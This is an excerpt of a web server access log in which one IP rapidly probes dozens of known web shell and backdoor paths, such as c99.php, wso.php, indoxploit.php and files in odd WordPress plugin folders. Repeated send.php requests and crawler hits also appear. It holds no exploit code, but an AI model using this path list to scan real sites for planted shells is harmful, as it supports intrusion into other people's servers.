Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:51 -0400] "GET /wp-admin/css/colors/coffee/fw.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:55 -0400] "GET /wp-admin/css/fw.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:08:58 -0400] "GET /wp-admin/includes/fw.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:01 -0400] "GET /wp-admin/maint/fw.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:03 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:07 -0400] "GET /wp-content/plugins/vwcleanerplugin/bump.php HTTP/1.1" 301 278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:09 -0400] "GET /wp-content/plugins/xichang/x.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:13 -0400] "GET /wp-content/plugins/zedd/1.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:16 -0400] "GET /wp-content/up.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:19 -0400] "GET /wp-content/wp.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:25 -0400] "GET /wp-mna.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:29 -0400] "GET /uploads/upload.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:31 -0400] "GET /wpx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:35 -0400] "GET /images/c99.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:38 -0400] "GET /xhell.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:42 -0400] "GET /xmrlpc.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:45 -0400] "GET /xz.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:47 -0400] "GET /yuuki.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:49 -0400] "GET /wp-content/plugins/upspy/index.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:51 -0400] "GET /wp-content/plugins/ubh/index.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:53 -0400] "GET /wp-content/plugins/vwcleanerplugin/bump.php?cache HTTP/1.1" 301 284 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:09:57 -0400] "GET /wp-content/themes/gaukingo/db.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:03 -0400] "GET /wp-content/plugins/three-column-screen-layout/db.php HTTP/1.1" 301 287 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:08 -0400] "GET /wp-content/plugins/xichang/x.php?xi HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:11 -0400] "GET /wp-content/plugins/html404/index.html HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:14 -0400] "GET /wp-content/plugins/wp-db-ajax-made/wp-ajax.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:17 -0400] "GET /wp-admin/shapes.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:19 -0400] "GET /XxX.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:23 -0400] "GET /Marvins.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 173.252.87.115 - - [13/Aug/2025:04:10:25 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [13/Aug/2025:04:10:29 -0400] "GET /wp-includes/css/modules.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:32 -0400] "GET /olux.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:34 -0400] "GET /indoxploit.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:40 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:43 -0400] "GET /wp-content/plugins/css-ready-sel/file.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:46 -0400] "GET /wp-content/plugins/css-ready/file.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:48 -0400] "GET /wp-content/think.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:50 -0400] "GET /wp-content/plugins/upspy/con.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:53 -0400] "GET /wp-content/plugins/upspy/up.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:55 -0400] "GET /wp-content/plugins/upspy/sllolx.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:10:57 -0400] "GET /database.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:11:00 -0400] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 301 288 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:11:02 -0400] "GET /shell20211028.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:11:05 -0400] "GET /wp-blog.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:11:08 -0400] "GET /repeater.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:11:13 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:04:11:20 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 173.252.95.32 - - [13/Aug/2025:04:12:09 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 68.183.245.101 - - [13/Aug/2025:04:16:11 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:04:16:11 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:04:16:11 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:04:16:11 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.95.112 - - [13/Aug/2025:04:18:05 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 209.38.125.40 - - [13/Aug/2025:04:22:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [13/Aug/2025:04:22:30 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [13/Aug/2025:04:22:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [13/Aug/2025:04:22:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 173.252.83.115 - - [13/Aug/2025:04:24:54 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 68.183.245.101 - - [13/Aug/2025:04:32:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:04:32:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:04:32:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:04:32:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [13/Aug/2025:04:36:16 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [13/Aug/2025:04:36:16 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [13/Aug/2025:04:36:16 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [13/Aug/2025:04:36:16 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:04:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:04:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:04:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:04:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:05:02:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:05:02:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:05:02:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:05:02:04 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 31.13.115.114 - - [13/Aug/2025:05:05:48 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 149.22.91.139 - - [13/Aug/2025:05:06:05 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [13/Aug/2025:05:06:05 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [13/Aug/2025:05:06:05 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [13/Aug/2025:05:06:05 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 69.171.231.113 - - [13/Aug/2025:05:06:56 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 206.189.247.132 - - [13/Aug/2025:05:17:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:05:17:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:05:17:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:05:17:08 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [13/Aug/2025:05:22:57 -0400] "HEAD / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 94.16.113.252 - - [13/Aug/2025:05:22:58 -0400] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 173.252.107.7 - - [13/Aug/2025:05:26:41 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 51.68.111.212 - - [13/Aug/2025:05:27:49 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)" 51.68.111.212 - - [13/Aug/2025:05:27:50 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)" 68.183.245.101 - - [13/Aug/2025:05:32:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:05:32:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:05:32:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:05:32:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:05:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:05:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:05:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:05:47:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:06:01:38 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:06:01:38 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:06:01:38 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 